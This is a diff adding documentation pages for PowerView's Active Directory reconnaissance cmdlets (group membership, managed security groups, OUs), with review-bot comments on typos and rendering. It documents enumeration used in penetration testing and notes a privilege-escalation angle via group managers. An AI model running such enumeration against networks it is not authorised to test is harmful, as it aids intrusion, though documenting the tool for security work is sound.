+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to query for.
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -MemberIdentity
+A SamAccountName (e.g.
+Group1), DistinguishedName (e.g.
+CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the user/group member to query for group membership.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: UserName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AdminCount
+Switch.
+Return users with '(adminCount=1)' (meaning are/were privileged).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.Group
+
+Custom PSObject with translated group property fields.
+
+## NOTES
+
+## RELATED LINKS
+
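Review bot: the `-AdminCount` description, "Return users with '(adminCount=1)' (meaning are/were privileged)", is copied from the user cmdlet; this function returns group objects, so it should say groups, and it is worth spelling out for readers that adminCount=1 is sticky (it is not cleared when an object leaves a protected group, which is what "are/were" alludes to), so results include formerly privileged groups. Other points in this file: `-Identity` says "Wildcards accepted" while the metadata block says `Accept wildcard characters: False`; `-ServerTimeLimit` says "Default of 120 seconds" but shows `Default value: 0`; "properies" in DESCRIPTION should be "properties"; Example 5's fence closes after the `$SecPassword` line, so the `$Cred` and `Get-DomainGroup -Credential $Cred` lines render as prose; and in Example 4 the verbose filter string shows `distinguishedname=CN=DesktopAdmins,...` without the space that the input `'CN=Desktop Admins,...'` has, which looks like a paste error in the sample output.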
diff --git a/docs/Recon/Get-DomainGroupMember.md b/docs/Recon/Get-DomainGroupMember.md new file mode 100755 index 0000000..5381b2c --- /dev/null +++ b/docs/Recon/Get-DomainGroupMember.md @@ -0,0 +1,401 @@ +# Get-DomainGroupMember
+
+## SYNOPSIS
+Return the members of a specific domain group.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainGroup, Get-DomainGroupMember, Convert-ADName, Get-DomainObject, ConvertFrom-SID
+
+## SYNTAX
+
+### None (Default)
+```
+Get-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>]
+ [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>]
+ [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+### ManualRecurse
+```
+Get-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-Recurse] [-LDAPFilter <String>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+### RecurseUsingMatchingRule
+```
+Get-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-RecurseUsingMatchingRule]
+ [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone]
+ [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for the specified
+group matching the criteria.
+Each result is then rebound and the full user
+or group object is returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainGroupMember "Desktop Admins"
+```
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : Testing Group
+MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberObjectClass : group
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+'Desktop Admins' | Get-DomainGroupMember -Recurse
+```
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : Testing Group
+MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberObjectClass : group
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129
+
+GroupDomain : testlab.local
+GroupName : Testing Group
+GroupDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : harmj0y
+MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainGroupMember -Domain testlab.local -Identity 'Desktop Admins' -RecurseUingMatchingRule
+```
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : harmj0y
+MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108
+
+GroupDomain : testlab.local
+GroupName : Desktop Admins
+GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
+MemberDomain : testlab.local
+MemberName : arobbins.a
+MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-DomainGroup *admin* -Properties samaccountname | Get-DomainGroupMember
+```
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+'CN=Enterprise Admins,CN=Users,DC=testlab,DC=local', 'Domain Admins' | Get-DomainGroupMember
+```
+
+### -------------------------- EXAMPLE 6 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGroupMember -Credential $Cred -Identity 'Domain Admins'
+
+### -------------------------- EXAMPLE 7 --------------------------
+```
+Get-Domain | Select-Object -Expand name
+```
+
+testlab.local
+
+'dev\domain admins' | Get-DomainGroupMember -Verbose
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainGroupMember\] Extracted domain 'dev.testlab.local' from 'dev\domain admins'
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainGroupMember\] Get-DomainGroupMember filter string: (&(objectCategory=group)(|(samAccountName=domain admins)))
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(distinguishedname=CN=user1,CN=Users,DC=dev,DC=testlab,DC=local)))
+
+GroupDomain : dev.testlab.local
+GroupName : Domain Admins
+GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+MemberDomain : dev.testlab.local
+MemberName : user1
+MemberDistinguishedName : CN=user1,CN=Users,DC=dev,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-339048670-1233568108-4141518690-201108
+
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(distinguishedname=CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local)))
+GroupDomain : dev.testlab.local
+GroupName : Domain Admins
+GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+MemberDomain : dev.testlab.local
+MemberName : Administrator
+MemberDistinguishedName : CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local
+MemberObjectClass : user
+MemberSID : S-1-5-21-339048670-1233568108-4141518690-500
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+Group1), DistinguishedName (e.g.
+CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to query for.
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Recurse
+Switch.
+If the group member is a group, recursively try to query its members as well.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ManualRecurse
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RecurseUsingMatchingRule
+Switch.
+Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query to recurse.
+Much faster than manual recursion, but doesn't reveal cross-domain groups,
+and only returns user accounts (no nested group objects themselves).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: RecurseUsingMatchingRule
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.GroupMember
+
+Custom PSObject with translated group member property fields.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/](http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/)
+
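Review bot: Example 3 will not run as written: `-RecurseUingMatchingRule` is missing the "s" and should be `-RecurseUsingMatchingRule`, the switch documented under PARAMETERS. Also in this file: Required Dependencies lists `Get-DomainGroupMember` itself, which is either a copy error or should be stated as recursion; `-Identity` says "Wildcards accepted" but the metadata block says `Accept wildcard characters: False`; `-ServerTimeLimit` says "Default of 120 seconds" against `Default value: 0`; and Example 6's code fence closes after the first line, so the `$Cred` and `Get-DomainGroupMember -Credential $Cred -Identity 'Domain Admins'` lines render as prose. The `-RecurseUsingMatchingRule` caveat ("doesn't reveal cross-domain groups, and only returns user accounts") is the most important statement on the page for anyone auditing privileged group membership, since members nested through a group from another domain will be silently missing from the output; consider repeating it in DESCRIPTION or NOTES so it is not buried under the parameter.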
diff --git a/docs/Recon/Get-DomainManagedSecurityGroup.md b/docs/Recon/Get-DomainManagedSecurityGroup.md new file mode 100755 index 0000000..13d48a2 --- /dev/null +++ b/docs/Recon/Get-DomainManagedSecurityGroup.md @@ -0,0 +1,177 @@ +# Get-DomainManagedSecurityGroup
+
+## SYNOPSIS
+Returns all security groups in the current (or target) domain that have a manager set.
+
+Author: Stuart Morgan (@ukstufus) \<stuart.morgan@mwrinfosecurity.com\>, Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject, Get-DomainGroup, Get-DomainObjectAcl
+
+## SYNTAX
+
+```
+Get-DomainManagedSecurityGroup [[-Domain] <String>] [-SearchBase <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
+ [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Authority to manipulate the group membership of AD security groups and distribution groups
+can be delegated to non-administrators by setting the 'managedBy' attribute.
+This is typically
+used to delegate management authority to distribution groups, but Windows supports security groups
+being managed in the same way.
+
+This function searches for AD groups which have a group manager set, and determines whether that
+user can manipulate group membership.
+This could be a useful method of horizontal privilege
+escalation, especially if the manager can manipulate the membership of a privileged group.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv
+```
+
+Store a list of all security groups with managers in group-managers.csv
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ManagedSecurityGroup
+
+A custom PSObject describing the managed security group.
+
+## NOTES
+
+## RELATED LINKS
+
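Review bot: DESCRIPTION says the function "determines whether that user can manipulate group membership", but OUTPUTS only says "A custom PSObject describing the managed security group" and neither INPUTS nor NOTES are filled in, so a reader cannot tell from the docs which field carries that determination or how it is made (the dependency list names Get-DomainObjectAcl, so presumably via the group's ACL). Document the output fields, in particular the one that records whether the manager has rights to change membership, since that is the value a defender would filter on when reviewing delegations over privileged groups. Also `-ServerTimeLimit` says "Default of 120 seconds" while the metadata shows `Default value: 0`, and SYNOPSIS says "security groups" while DESCRIPTION mentions both security and distribution groups; clarify which are returned.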
diff --git a/docs/Recon/Get-DomainOU.md b/docs/Recon/Get-DomainOU.md new file mode 100755 index 0000000..cc1fd39 --- /dev/null +++ b/docs/Recon/Get-DomainOU.md @@ -0,0 +1,316 @@ +# Get-DomainOU
+
+## SYNOPSIS
+Search for all organization units (OUs) or specific OU objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainOU [[-Identity] <String[]>] [-GPLink <String>] [-Domain <String>] [-LDAPFilter <String>]
+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
+ [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties whencreated,usnchanged,...".
+By default, all OU objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainOU
+```
+
+Returns the current OUs in the domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainOU *admin* -Domain testlab.local
+```
+
+Returns all OUs with "admin" in their name in the testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainOU -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
+```
+
+Returns all OUs with linked to the specified group policy object.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+"*admin*","*server*" | Get-DomainOU
+```
+
+Search for OUs with the specific names.
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainOU -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+An OU name (e.g.
+TestOU), DistinguishedName (e.g.
+OU=TestOU,DC=testlab,DC=local), or
+GUID (e.g.
+8a9ba22a-8977-47e6-84ce-8c26af4e1e6a).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -GPLink
+Only return OUs with the specified GUID in their gplink property.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: GUID
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.OU
+
+Custom PSObject with translated OU property fields.
+
+## NOTES
+
+## RELATED LINKS
+
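Review bot: Example 5 is rendered broken. The code fence closes after `$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force`, and the two lines that actually use the credential, `$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)` and `Get-DomainOU -Credential $Cred`, fall outside the fence as plain text. platyPS ends the example code at the first blank line, so the fix belongs in the comment-based help: keep the three commands on consecutive lines with no blank line between them and regenerate. Two smaller points in the same file: `properies` in DESCRIPTION should be `properties`, and Example 3's `Returns all OUs with linked to the specified group policy object.` should read `Returns all OUs linked to the specified group policy object.` Finally, -Identity says `Wildcards accepted.` while its yaml block says `Accept wildcard characters: False`; adding `[SupportsWildcards()]` to that parameter would make the generated block agree with the prose.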
diff --git a/docs/Recon/Get-DomainObject.md b/docs/Recon/Get-DomainObject.md new file mode 100755 index 0000000..f900c53 --- /dev/null +++ b/docs/Recon/Get-DomainObject.md @@ -0,0 +1,318 @@ +# Get-DomainObject
+
+## SYNOPSIS
+Return all (or specified) domain objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-ADName
+
+## SYNTAX
+
+```
+Get-DomainObject [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>]
